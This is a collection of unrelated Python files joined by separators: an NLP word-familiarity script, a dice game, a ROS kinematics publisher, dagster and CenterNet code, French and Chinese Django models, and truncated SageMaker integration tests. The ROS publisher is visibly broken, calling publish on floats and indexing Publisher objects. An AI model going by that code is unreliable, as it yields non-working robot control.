#text_list = f.read().splitlines()
text = f.read()
#正規表現で"を削除
text = re.sub('"', '', text)
#文章
pos = nlp(text)
kazu=0
hinsi=[]#品詞の名前
hinsi_kosuu=[]#品詞の個数.配列は品詞の名前と対応している.
list_bangou=0
kigou_reigai=["=","+","'"]#総単語数に数えない記号
kigou=0
#内容語の品詞
#naiyougo_list=["NN","NNS", "NNP", "NNPS", "VB", "VBN", "VBP", "VBZ","JJ", "JJR", "JJS", "RB", "RBR", "RBS"]
#naiyougo_list=["NN", "VB", "JJ", "RB"] #名詞,動詞,形容詞,副詞
naiyougo_list=["ADJ","ADV", "NOUN", "VERB"]
sent=""
wariai=[]
for token in pos:
#内容語なら
if token.pos_ in naiyougo_list:
#レンマ化
sent = token.lemma_
#親やすさdicに入っていれば
if sent.lower() in sitasimi_tango:
wariai.append(sitasimi_tango[sent.lower()])
#結果
print(sum(wariai))
print(len(wariai))
hasseiritu = sum(wariai)/len(wariai)
print(hasseiritu)
#476.452 438.136
#418.619 429.575
|
from random import randint
from time import sleep
cont = 1
print('Dados jogados!!!')
dados = {'Pessoa 1': randint(1,6),
'Pessoa 2': randint(1,6),
'Pessoa 3': randint(1,6),
'Pessoa 4': randint(1,6)}
for item in sorted(dados, key = dados.get, reverse = True):
sleep(1)
print (f'{cont}º lugar: {item} com {dados[item]}.')
cont += 1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import rospy
from std_msgs.msg import Float64
import math
import forward_kinematics_module
theta = [math.pi/2,0]
d = [0,0]
alpha = [0,0]
a = [120,109.25]
def forward_kinematics_publisher():
limb1 = rospy.Publisher('/manipulator/limb1_controller/command',Float64, queue_size=10)
leg1 = rospy.Publisher('/manipulator/leg1_controller/command',Float64, queue_size=10)
rospy.init_node('forward_kinematics_publisher', anonymous=True)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb1 = float(input("{:22s}".format("Enter theta_limb1: ")))
theta_leg1 = float(input("{:22s}".format("Enter theta_leg1: ")))
theta = [theta_limb1, theta_leg1, 0]
if 0.0 <= theta_limb1 <= 180.0 and 0.0 <= theta_leg1 <= 180.0:
limb1[0] = (theta_limb1)*math.pi/180
leg1[1] = (theta_leg1)*math.pi/180
rospy.loginfo("\ntheta_base = %f\ntheta_shoulder = %f\ntheta_elbow = %f", limb1[0], leg1[1])
theta_limb1.publish(limb1[0])
theta_limb1.publish(leg1[1])
print ("=========================\n")
limb2 = rospy.Publisher('/manipulator/limb2_controller/command',Float64, queue_size=10)
leg2 = rospy.Publisher('/manipulator/leg2_controller/command',Float64, queue_size=10)
rospy.init_node('forward_kinematics_publisher', anonymous=True)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb2 = float(input("{:22s}".format("Enter theta_limb2: ")))
theta_leg2 = float(input("{:22s}".format("Enter theta_leg2: ")))
theta = [theta_limb2, theta_leg2, 0]
if 0.0 <= theta_limb2 <= 180.0 and 0.0 <= theta_leg2 <= 180.0:
limb2[0] = (theta_limb2)*math.pi/180
leg2[1] = (theta_leg2)*math.pi/180
rospy.loginfo("\ntheta_base = %f\ntheta_shoulder = %f\ntheta_elbow = %f", limb2[0], leg2[1])
theta_limb2.publish(limb2[0])
theta_limb2.publish(leg2[1])
print ("=========================\n")
limb3= rospy.Publisher('/manipulator/limb3_controller/command',Float64, queue_size=10)
leg3 = rospy.Publisher('/manipulator/leg3_controller/command',Float64, queue_size=10)
rospy.init_node('forward_kinematics_publisher', anonymous=True)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb3 = float(input("{:22s}".format("Enter theta_limb3: ")))
theta_leg3 = float(input("{:22s}".format("Enter theta_leg3: ")))
theta = [theta_limb3, theta_leg3, 0]
if 0.0 <= theta_limb3 <= 180.0 and 0.0 <= theta_leg3 <= 180.0:
limb3[0] = (theta_limb3)*math.pi/180
leg3[1] = (theta_leg3)*math.pi/180
rospy.loginfo("\ntheta_base = %f\ntheta_shoulder = %f\ntheta_elbow = %f", limb3[0], leg3[1])
theta_limb3.publish(limb3[0])
theta_limb3.publish(leg3[1])
print ("=========================\n")
limb4 = rospy.Publisher('/manipulator/limb4_controller/command',Float64, queue_size=10)
leg4 = rospy.Publisher('/manipulator/leg4_controller/command',Float64, queue_size=10)
rospy.init_node('forward_kinematics_publisher', anonymous=True)
rate = rospy.Rate(10) #10hz
while not rospy.is_shutdown():
theta_limb4 = float(input("{:22s}".format("Enter theta_limb4: ")))
theta_leg4 = float(input("{:22s}".format("Enter theta_leg4 ")))
theta = [theta_limb4, theta_leg4, 0]
if 0.0 <= theta_limb4 <= 180.0 and 0.0 <= theta_leg4 <= 180.0:
limb4[0] = (theta_limb4)*math.pi/180
leg4[1] = (theta_leg4)*math.pi/180
rospy.loginfo("\ntheta_base = %f\ntheta_shoulder = %f\ntheta_elbow = %f", limb4[0], leg4[1])
theta_limb4.publish(limb4[0])
theta_limb4.publish(leg4[1])
print ("=========================\n")
final_transformation_matrix = forward_kinematics_module.compute_coordinates(theta, d, alpha, a)
if __name__ == '__main__':
try:
forward_kinematics_publisher()
except rospy.ROSInterruptException:
pass
|
import warnings
from dagster import check
def canonicalize_backcompat_args(
new_val, new_arg, old_val, old_arg, coerce_old_to_new=None, additional_warn_txt=None
):
'''
Utility for managing backwards compatibility of two related arguments.
For example if you had an existing function
def is_new(old_flag):
return not new_flag
And you decided you wanted a new function to be:
def is_new(new_flag):
return new_flag
However you want an in between period where either flag is accepted. Use
canonicalize_backcompat_args to manage that:
def is_new(old_flag=None, new_flag=None):
return canonicalize_backcompat_args(
new_val=new_flag,
new_arg='new_flag',
old_val=old_flag,
old_arg='old_flag',
coerce_old_to_new=lambda val: not val,
)
In this example, if the caller sets both new_flag and old_flag, it will fail by throwing
a CheckError. If the caller sets old_flag, it will run it through the coercion function
, warn, and then execute.
canonicalize_backcompat_args returns the value as if *only* new_val were specified
'''
check.str_param(new_arg, 'new_arg')
check.str_param(old_arg, 'old_arg')
check.opt_callable_param(coerce_old_to_new, 'coerce_old_to_new')
check.opt_str_param(additional_warn_txt, 'additional_warn_txt')
if new_val is not None:
if old_val is not None:
check.failed(
'Do not use deprecated "{old_arg}" now that you are using "{new_arg}".'.format(
old_arg=old_arg, new_arg=new_arg
)
)
return new_val
if old_val is not None:
warnings.warn(
'"{old_arg}" is deprecated, use "{new_arg}" instead.'.format(
old_arg=old_arg, new_arg=new_arg
)
+ (' ' + additional_warn_txt)
if additional_warn_txt
else '',
# This punches up to the caller of canonicalize_backcompat_args
stacklevel=3,
)
return coerce_old_to_new(old_val) if coerce_old_to_new else old_val
return new_val
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
import sys
import csv
# try:
# from external.nms import soft_nms
# except:
# print('NMS not imported! If you need it,'
# ' do \n cd $CenterNet_ROOT/src/lib/external \n make')
sys.path.insert(0, '../')
from models.decode import ctdet_decode
from models.utils import flip_tensor
from utils.image import get_affine_transform
from utils.post_process import ctdet_post_process
from utils.debugger import Debugger
from detectors.base_detector import BaseDetector
from detectors.utils import soft_nms
class CtdetDetector(BaseDetector):
def __init__(self, opt):
super(CtdetDetector, self).__init__(opt)
def process(self, images, return_time=False):
with torch.no_grad():
output = self.model(images)[-1]
hm = output['hm'].sigmoid_()
wh = output['wh']
reg = output['reg'] if self.opt.reg_offset else None
if self.opt.flip_test:
hm = (hm[0:1] + flip_tensor(hm[1:2])) / 2
wh = (wh[0:1] + flip_tensor(wh[1:2])) / 2
reg = reg[0:1] if reg is not None else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ctdet_decode(hm, wh, reg=reg, cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
# 尺度变换
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
dets = dets.reshape(1, -1, dets.shape[2])
dets = ctdet_post_process(
dets.copy(), [meta['c']], [meta['s']],
meta['out_height'], meta['out_width'], self.opt.num_classes)
for j in range(1, self.num_classes + 1):
dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
dets[0][j][:, :4] /= scale
return dets[0]
# 使用soft_nms对框做筛选
def merge_outputs(self, detections):
results = {}
for j in range(1, self.num_classes + 1):
results[j] = np.concatenate(
[detection[j] for detection in detections], axis=0).astype(np.float32)
if len(self.scales) > 1 or self.opt.nms:
soft_nms(results[j], thresh=0.5, type='gaussian')
scores = np.hstack(
[results[j][:, 4] for j in range(1, self.num_classes + 1)])
if len(scores) > self.max_per_image:
kth = len(scores) - self.max_per_image
thresh = np.partition(scores, kth)[kth]
for j in range(1, self.num_classes + 1):
keep_inds = (results[j][:, 4] >= thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
detection = dets.detach().cpu().numpy().copy()
detection[:, :, :4] *= self.opt.down_ratio
for i in range(1):
img = images[i].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][i].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm_{:.1f}'.format(scale))
debugger.add_img(img, img_id='out_pred_{:.1f}'.format(scale))
for k in range(len(dets[i])):
if detection[i, k, 4] > self.opt.center_thresh:
debugger.add_coco_bbox(detection[i, k, :4], detection[i, k, -1],
detection[i, k, 4],
img_id='out_pred_{:.1f}'.format(scale))
def show_results(self, debugger, image, results, img_num):
lab_name = ['holothurian', 'starfish', 'echinus', 'scallop']
debugger.add_img(image, img_id='ctdet')
with open('1.csv', 'a+', newline='', encoding='utf-8') as f:
# if f.readlines() is not None:
# fieldnames = ['name', 'image_id', 'confidence', 'xmin', 'ymin', 'xmax','ymax']
# writer = csv.DictWriter(f, fieldnames=fieldnames)
# writer.writeheader()
f = csv.writer(f, delimiter=',')
for j in range(1, self.num_classes + 1):
for bbox in results[j]:
if bbox[4] > self.opt.vis_thresh:
debugger.add_coco_bbox(bbox[:4], j - 1, bbox[4], img_id='ctdet')
f.writerow([lab_name[j - 1], img_num[:-4] + '.xml', str(bbox[4]), \
str(int(bbox[0])), str(int(bbox[1])), str(int(bbox[2])), str(int(bbox[3]))])
# writer.writerow({'name':lab_name[j - 1], 'image_id':img_num[:-4] + '.xml', \
# 'confidence':str(bbox[4]), 'xmin':str(int(bbox[0])), 'ymin':str(int(bbox[1])), \
# 'xmax':str(int(bbox[2])), 'ymax':str(int(bbox[3]))})
# print('bbox', bbox[0], bbox[1], bbox[2], bbox[3], bbox[4])
# debugger.show_all_imgs(pause=self.pause)
#debugger.save_all_imgs(path='/mnt/data-1/data/lcx/CenterNet-master/outputs', genID=True)
|
from collections import OrderedDict
from math import ceil
from datetime import datetime
from calendar import Calendar
from django.db import models
from django.conf import settings
from django.shortcuts import resolve_url
from dateutils import relativedelta
from sorl.thumbnail import ImageField, get_thumbnail
from django.template.defaultfilters import pluralize
from markdown import markdown
from .decorators import method_cache
class Diet(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name = 'régime'
class Ingredient(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
unit = models.CharField(max_length=100, verbose_name='unité',
choices=(('g', 'g'),
('kg', 'kg'),
('cl', 'cl'),
('l', 'l'),
('unit', 'unité'),))
price = models.FloatField(verbose_name='prix')
providers = models.TextField(blank=True, verbose_name='fournisseurs')
diets = models.ManyToManyField(Diet, blank=True, verbose_name='régimes')
@method_cache()
def diets_str(self):
return ', '.join([d.name.title() for d in self.diets.all()]) if\
self.diets.count() else 'Omnivore'
diets_str.short_description = 'Régimes'
def __str__(self):
return self.name
def get_absolute_url(self):
return resolve_url('ingredient_detail', pk=self.pk)
class Meta:
verbose_name = 'ingrédient'
class RecipeIngredient(models.Model):
recipe = models.ForeignKey('Recipe', verbose_name='recette')
ingredient = models.ForeignKey(Ingredient, verbose_name='ingrédient')
quantity = models.FloatField(verbose_name='quantité')
def __str__(self):
if self.recipe and self.ingredient:
return '{recipe} — {ingredient}'\
.format(recipe=self.recipe, ingredient=self.ingredient)
else:
return 'Ingrédient de recette'
class Meta:
verbose_name = 'ingrédient de recette'
verbose_name_plural = 'ingrédients de recette'
class Ustensil(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
def __str__(self):
return self.name
class Meta:
verbose_name = 'ustensile'
class ParentRecipe(models.Model):
parent = models.ForeignKey('Recipe', verbose_name='recette parente',
related_name='childrecipe_set')
child = models.ForeignKey('Recipe', verbose_name='recette enfant',
related_name='parentrecipe_set')
class Meta:
verbose_name = 'recette parente'
verbose_name_plural = 'recettes parentes'
class Recipe(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
meal_type = models.CharField(max_length=10,
choices=(('starter', 'entrée'),
('meal', 'plat'),
('dessert', 'dessert')),
verbose_name='type de recette',
)
parts = models.IntegerField(verbose_name='nombre de parts')
picture = ImageField(upload_to='recipe', verbose_name='image', blank=True)
preparation_time = models.DurationField(null=True, blank=True,
verbose_name='temps de '
'préparation',
help_text='Entrez le temps de '
'préparation requis, au format '
'HH:MM:SS. Laissez vide si non '
'nécessaire.')
cooking_time = models.DurationField(null=True, blank=True,
verbose_name='temps de cuisson',
help_text='Entrez le temps de '
'cuisson requis, au format HH:MM:SS. '
'Laissez vide si non nécessaire.')
description = models.TextField(verbose_name='descriptif de la recette')
licence = models.TextField(blank=True, verbose_name='licence',
default=settings.DEFAULT_RECIPE_LICENCE)
author = models.CharField(max_length=100, verbose_name='auteur',
default=settings.DEFAULT_RECIPE_AUTHOR)
parent_recipes = models.ManyToManyField('self', blank=True,
verbose_name='recettes de base',
through=ParentRecipe,
through_fields=('child', 'parent'),
symmetrical=False,
related_name='children_recipes')
ingredients = models.ManyToManyField(Ingredient, through=RecipeIngredient,
verbose_name='ingrédients')
ustensils = models.ManyToManyField(Ustensil, blank=True,
verbose_name='ustensiles')
diets = models.ManyToManyField(Diet, verbose_name='régimes')
def __str__(self):
return self.name
def picture_str(self):
thumb = get_thumbnail(self.picture, '100x100', crop='center')
if thumb:
return '<img src="{}" alt="" />'.format(thumb.url)
else:
return ''
picture_str.short_description = 'Image'
picture_str.allow_tags = True
def get_contents(self):
return markdown(self.description)
def get_licence(self):
return markdown(self.licence)
def get_diets(self):
""" return the list of diets for this recipe.
"""
diets = [[d for d in i.diets.all()]
for i in self.ingredients.all()]
total_diets = set()
for diet in diets:
if len(total_diets) == 0:
total_diets = set(diet)
total_diets = total_diets.intersection(diet)
for cur_diet in self.diets.all():
if cur_diet not in total_diets:
self.diets.remove(cur_diet)
self.diets.add(*total_diets)
def diets_str(self):
diets = [d.name for d in self.diets.all()]
return ', '.join(diets) if diets else 'Omnivore'
diets_str.short_description = 'régimes'
@method_cache()
def price(self):
""" return the total price of the recipe
"""
price = 0
for recipe_ingredient in self.recipeingredient_set.all():
price += recipe_ingredient.ingredient.price *\
recipe_ingredient.quantity
return '{} €'.format(price) # TODO: the currency should be dynamic
price.short_description = 'prix'
def get_absolute_url(self):
return resolve_url('recipe_detail', pk=self.pk)
class Meta:
verbose_name = 'recette'
class MealParticipant(models.Model):
meal = models.ForeignKey('Meal', verbose_name='repas')
diet = models.ForeignKey(Diet, verbose_name='régime', blank=True,
null=True,
help_text='Laissez vide si pas de régime spécial')
count = models.IntegerField(verbose_name='nombre de personnes')
def diet_name(self):
return self.diet.name if self.diet else 'Omnivore'
@method_cache()
def can_eat(self):
"""returns a list of recipes that those participants can eat.
"""
if self.diet is None:
return self.meal.recipes.all()
return [r for r in self.meal.recipes.all()
if self.diet in r.diets.all()]
def __str__(self):
return '{meal} — {count} × {diet}'.format(meal=self.meal,
count=self.count,
diet=self.diet_name())
class Meta:
verbose_name = 'participant à un repas'
verbose_name_plural = 'participants à un repas'
class Meal(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
date = models.DateTimeField(verbose_name='Date et heure')
recipes = models.ManyToManyField(Recipe, verbose_name='recettes')
session = models.ForeignKey('Session', blank=True, null=True)
def __str__(self):
return self.name
@method_cache()
def recipes_list(self):
return self.recipes.order_by('meal_type')
@method_cache()
def participants(self):
return self.mealparticipant_set.all()
@method_cache()
def participants_count(self):
return sum([mp.count for mp in self.mealparticipant_set.all()])
participants_count.short_description = 'Nombre de participants'
@method_cache()
def ingredients_list(self):
"""returns a list of ingredients needed for all recipes in this meal.
The ingredients are returned as dicts containing the Ingredient itself,
the quantity needed, and the total price of that ingredient.
"""
ingredients = {}
for recipe in self.recipes.all():
# first, we get the total number of parts we have to make (we only
# count diet-compatible participants).
# then, we calculate the total number of this recipe that will be
# needed.
parts_count = self.recipe_diet_participants()[recipe]
recipe_count = ceil(parts_count / recipe.parts)
for recipe_ingredient in recipe.recipeingredient_set.all():
if recipe_ingredient.quantity * recipe_count > 0:
if recipe_ingredient.ingredient not in ingredients:
ingredients[recipe_ingredient.ingredient] = 0
ingredients[recipe_ingredient.ingredient] += \
recipe_ingredient.quantity * recipe_count
ingredients_list = []
for ingredient, quantity in ingredients.items():
ingredients_list.append({'ingredient': ingredient,
'quantity': quantity,
'price': quantity * ingredient.price})
return ingredients_list
@method_cache()
def total_price(self):
"""returns the sum of the individual price of each ingredient in each
recipe of the meal.
"""
price = sum([i['price'] for i in self.ingredients_list()])
return price
@method_cache()
def ustensils_list(self):
ustensils = {}
for recipe in self.recipes.all():
for ustensil in recipe.ustensils.all():
if ustensil not in ustensils:
ustensils[ustensil] = []
ustensils[ustensil].append(recipe)
return [{'ustensil': u, 'used_in': r} for u, r in ustensils.items()]
@method_cache()
def recipe_diet_participants(self):
"""returns a dict containing participants count for each recipe of the
meal.
"""
participants = {}
omni_participants_count = sum([p.count for p in
self.mealparticipant_set
.filter(diet=None)])
for recipe in self.recipes.all():
if recipe not in participants:
participants[recipe] = omni_participants_count
diets = recipe.diets.all()
for diet in diets:
participants[recipe] += sum([p.count for p in
self.mealparticipant_set
.filter(diet__name=diet)])
return participants
@method_cache()
def warnings(self):
"""returns a list of warnings concerning this meal (does a recipe not
have any compatible participant? Cannot a participant eat something?)
"""
warnings = OrderedDict()
for recipe, part in self.recipe_diet_participants().items():
if part == 0:
warnings[recipe] = ('Personne ne peut manger {}'
.format(recipe))
for part in self.participants():
if not part.can_eat():
warnings[part] = ('{} {}{} ne peu{}t rien manger'
.format(part.count,
part.diet,
pluralize(part.count),
pluralize(part.count, 'ven')))
return warnings
def admin_warnings(self):
warnings = self.warnings().values()
if len(warnings):
return '\n'.join(['<p class="text-danger"><span class="glyphicon '
'glyphicon-exclamation-sign"></span> {}</p>\n'
.format(s) for s in warnings])
else:
return '<p class="text-success"><span class="glyphicon '\
'glyphicon-ok-sign"></span> Tout va bien ♥</p>'
admin_warnings.short_description = 'Avertissements'
admin_warnings.allow_tags = True
@method_cache()
def status(self):
"""returns whether this meal is complete (has something for each
participant) or not.
"""
return len(self.warnings()) == 0
status.short_description = 'Statut'
def admin_roadmap(self):
return '<a href="{url}" title="Générer la feuille de route" '\
'target="_blank"><span class=" glyphicon glyphicon-list">'\
'</span></a>'.format(
url=resolve_url('roadmap_meal',
meal_id=self.id))
admin_roadmap.short_description = 'Feuille de route'
admin_roadmap.allow_tags = True
class Meta:
verbose_name = 'repas'
verbose_name_plural = 'repas'
class Session(models.Model):
name = models.CharField(max_length=100, verbose_name='nom')
def calendar(self):
"""generates calendars representing all meals in the session, as a list
of Calendar.monthdatescalendar() lists.
In those lists, the second values of tuples are the corresponding Meal
objects.
"""
cur_month = None
meals = self.meal_set.order_by('date')
meals_dates = {}
meals_count = 0
for meal in meals:
cur_month = meal.date if cur_month is None else cur_month
meals_count += 1
if meal.date not in meals_dates:
if meal.date.date() not in meals_dates:
meals_dates[meal.date.date()] = []
meals_dates[meal.date.date()].append(meal)
if not cur_month:
cur_month = datetime.now()
months = []
cal = Calendar()
month = cal.monthdatescalendar(cur_month.year, cur_month.month)
remaining_meals = meals_count
while remaining_meals > 0:
month = cal.monthdatescalendar(cur_month.year, cur_month.month)
for i, month_week in enumerate(month):
for j, day in enumerate(month_week):
meal_dates = meals_dates[day] if day in meals_dates and \
day.month == cur_month.month else []
remaining_meals -= len(meal_dates)
month[i][j] = {'date': month[i][j], 'meals': meal_dates}
months.append({'month': cur_month, 'dates': month})
cur_month = cur_month + relativedelta(months=1)
return months
@method_cache()
def ingredients_list(self):
"""returns a list of ingredients needed for all recipes in all meals of
this session. The ingredients are returned as dicts containing the
Ingredient itself, the quantity needed, and the total price of that
ingredient.
"""
ingredients = OrderedDict()
for meal in self.meal_set.order_by('date'):
for ingredient in meal.ingredients_list():
if ingredient['ingredient'] in ingredients:
ingredients[ingredient['ingredient']]['quantity'] += \
ingredient['quantity']
ingredients[ingredient['ingredient']]['price'] += \
ingredient['price']
else:
ingredients[ingredient['ingredient']] = ingredient
ingredients[ingredient['ingredient']]['date'] = \
meal.date
ingredients_list = [i for i in ingredients.values()]
return ingredients_list
@method_cache()
def total_price(self):
"""returns the sum of the individual price of each ingredient in each
recipe of each meal of this session.
"""
price = sum([i['price'] for i in self.ingredients_list()])
return price
def meals(self):
"""returns the Meal list, ordered by date.
"""
return self.meal_set.order_by('date')
def admin_roadmap(self):
return '<a href="{url}" title="Générer la feuille de route" '\
'target="_blank"><span class=" glyphicon glyphicon-list">'\
'</span></a>'.format(url=resolve_url('roadmap_session',
session_id=self.id))
admin_roadmap.short_description = 'Feuille de route'
admin_roadmap.allow_tags = True
@method_cache()
def warnings(self):
"""returns a list of warnings concerning this session
"""
warnings_list = [m.warnings() for m in self.meal_set.all()]
warnings = OrderedDict()
for warning in warnings_list:
warnings.update(warning)
return warnings
def admin_warnings(self):
warnings = self.warnings().values()
if len(warnings):
return '\n'.join(['<p class="text-danger"><span class="glyphicon '
'glyphicon-exclamation-sign"></span> {}</p>\n'
.format(s) for s in warnings])
else:
return '<p class="text-success"><span class="glyphicon '\
'glyphicon-ok-sign"></span> Tout va bien ♥</p>'
admin_warnings.short_description = 'Avertissements'
admin_warnings.allow_tags = True
def __str__(self):
return self.name
class Meta:
verbose_name = 'session'
|
from .__about__ import (
__author__,
__commit__,
__copyright__,
__email__,
__license__,
__summary__,
__title__,
__uri__,
__version__,
)
from .koumura import parse_xml, load_song_annot, get_trans_mat
from .koumura import Syllable, Sequence
from .koumura import Resequencer
|
from django.db import models
from enterprise_manage.apps.user_center.models import UserProfile
class ScoreProject(models.Model):
name = models.CharField(verbose_name='名称', max_length=30)
class Meta:
verbose_name = "打分项目"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class ScoreOption(models.Model):
name = models.CharField(verbose_name='名称', max_length=30)
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
score_min = models.IntegerField(verbose_name='最小分值')
score_max = models.IntegerField(verbose_name='最大分值')
class Meta:
verbose_name = "打分选项"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class UserProfileScoreProject(models.Model):
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
to_user_profile = models.ForeignKey(UserProfile, verbose_name='关联用户', on_delete=models.CASCADE)
exclude_user_profile = models.ManyToManyField(
UserProfile,
related_name='exclude_user_profile',
verbose_name='不评选人员',
default=None,
null=True,
blank=True
)
class Meta:
verbose_name = "用户参与的打分项目"
verbose_name_plural = verbose_name
def __str__(self):
return '{}-{}'.format(self.to_score_project.name, self.to_user_profile.name)
class ScoreUserProfile(models.Model):
to_score_project = models.ForeignKey(ScoreProject, verbose_name='关联打分项目', on_delete=models.CASCADE)
to_user_profile = models.ForeignKey(UserProfile, verbose_name='关联人员', on_delete=models.CASCADE)
order_num = models.IntegerField(verbose_name='排序', default=0, blank=True)
class Meta:
verbose_name = "参与打分的人员表"
verbose_name_plural = verbose_name
unique_together = ['to_score_project', 'to_user_profile']
def __str__(self):
return self.to_score_project.name
class ScoreResult(models.Model):
to_score_user_profile = models.ForeignKey(ScoreUserProfile, verbose_name='关联打分人员表', on_delete=models.CASCADE)
to_score_option = models.ForeignKey(ScoreOption, verbose_name='关联打分项', on_delete=models.CASCADE)
create_user = models.ForeignKey(UserProfile, verbose_name='打分人员', on_delete=models.CASCADE)
create_time = models.DateTimeField(auto_now_add=True)
score_result = models.FloatField(verbose_name='分值', blank=True, default=0)
class Meta:
verbose_name = "打分结果"
verbose_name_plural = verbose_name,
unique_together = ['to_score_user_profile', 'to_score_option', 'create_user']
def __str__(self):
return self.to_score_user_profile.to_score_project.name
|
def my_func(p1=1) -> object:
return p1
d = my_func(1)
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import os
from packaging import version
import pytest
from sagemaker.huggingface import HuggingFace
from sagemaker.huggingface import TrainingCompilerConfig as HFTrainingCompilerConfig
from sagemaker.tensorflow import TensorFlow
from sagemaker.tensorflow import TrainingCompilerConfig as TFTrainingCompilerConfig
from tests import integ
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout
@pytest.fixture(scope="module")
def gpu_instance_type(request):
return "ml.p3.2xlarge"
@pytest.fixture(scope="module")
def imagenet_val_set(request, sagemaker_session, tmpdir_factory):
"""
Copies the dataset from the bucket it's hosted in to the local bucket in the test region
"""
local_path = tmpdir_factory.mktemp("trcomp_imagenet_val_set")
sagemaker_session.download_data(
path=local_path,
bucket="collection-of-ml-datasets",
key_prefix="Imagenet/TFRecords/validation",
)
train_input = sagemaker_session.upload_data(
path=local_path,
key_prefix="integ-test-data/trcomp/tensorflow/imagenet/val",
)
return train_input
@pytest.fixture(scope="module")
def huggingface_dummy_dataset(request, sagemaker_session):
"""
Copies the dataset from the local disk to the local bucket in the test region
"""
data_path = os.path.join(DATA_DIR, "huggingface")
train_input = sagemaker_session.upload_data(
path=os.path.join(data_path, "train"),
key_prefix="integ-test-data/trcomp/huggingface/dummy/train",
)
return train_input
@pytest.fixture(scope="module", autouse=True)
def skip_if_incompatible(request):
"""
These tests are for training compiler enabled images/estimators only.
"""
if integ.test_region() not in integ.TRAINING_COMPILER_SUPPORTED_REGIONS:
pytest.skip("SageMaker Training Compiler is not supported in this region")
if integ.test_region() in integ.TRAINING_NO_P3_REGIONS:
pytest.skip("no ml.p3 instances in this region")
@pytest.mark.release
def test_huggingface_pytorch(
sagemaker_session,
gpu_instance_type,
huggingface_training_compiler_latest_version,
huggingface_training_compiler_pytorch_latest_version,
huggingface_dummy_dataset,
):
"""
Test the HuggingFace estimator with PyTorch
"""
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "huggingface")
hf = HuggingFace(
py_version="py38",
entry_point=os.path.join(data_path, "run_glue.py"),
role="SageMakerRole",
transformers_version=huggingface_training_compiler_latest_version,
pytorch_version=huggingface_training_compiler_pytorch_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"model_name_or_path": "distilbert-base-cased",
"task_name": "wnli",
"do_train": True,
"do_eval": True,
"max_seq_length": 128,
"fp16": True,
"per_device_train_batch_size": 128,
"output_dir": "/opt/ml/model",
},
environment={"GPU_NUM_DEVICES": "1"},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=HFTrainingCompilerConfig(),
)
hf.fit(huggingface_dummy_dataset)
@pytest.mark.release
def test_huggingface_tensorflow(
sagemaker_session,
gpu_instance_type,
huggingface_training_compiler_latest_version,
huggingface_training_compiler_tensorflow_latest_version,
huggingface_dummy_dataset,
):
"""
Test the HuggingFace estimator with TensorFlow
"""
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "huggingface")
hf = HuggingFace(
py_version="py38",
entry_point=os.path.join(data_path, "run_tf.py"),
role="SageMakerRole",
transformers_version=huggingface_training_compiler_latest_version,
tensorflow_version=huggingface_training_compiler_tensorflow_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"model_name_or_path": "distilbert-base-cased",
"per_device_train_batch_size": 128,
"per_device_eval_batch_size": 128,
"output_dir": "/opt/ml/model",
"overwrite_output_dir": True,
"save_steps": 5500,
},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=HFTrainingCompilerConfig(),
)
hf.fit(huggingface_dummy_dataset)
@pytest.mark.release
def test_tensorflow(
sagemaker_session,
gpu_instance_type,
tensorflow_training_latest_version,
imagenet_val_set,
):
"""
Test the TensorFlow estimator
"""
if version.parse(tensorflow_training_latest_version) < version.parse("2.9"):
pytest.skip("Training Compiler only supports TF >= 2.9")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
epochs = 10
batch = 256
train_steps = int(10240 * epochs / batch)
steps_per_loop = train_steps // 10
overrides = (
f"runtime.enable_xla=True,"
f"runtime.num_gpus=1,"
f"runtime.distribution_strategy=one_device,"
f"runtime.mixed_precision_dtype=float16,"
f"task.train_data.global_batch_size={batch},"
f"task.train_data.input_path=/opt/ml/input/data/training/validation*,"
f"task.train_data.cache=False,"
f"trainer.train_steps={train_steps},"
f"trainer.steps_per_loop={steps_per_loop},"
f"trainer.summary_interval={steps_per_loop},"
f"trainer.checkpoint_interval={train_steps},"
f"task.model.backbone.type=resnet,"
f"task.model.backbone.resnet.model_id=50"
)
tf = TensorFlow(
py_version="py39",
git_config={
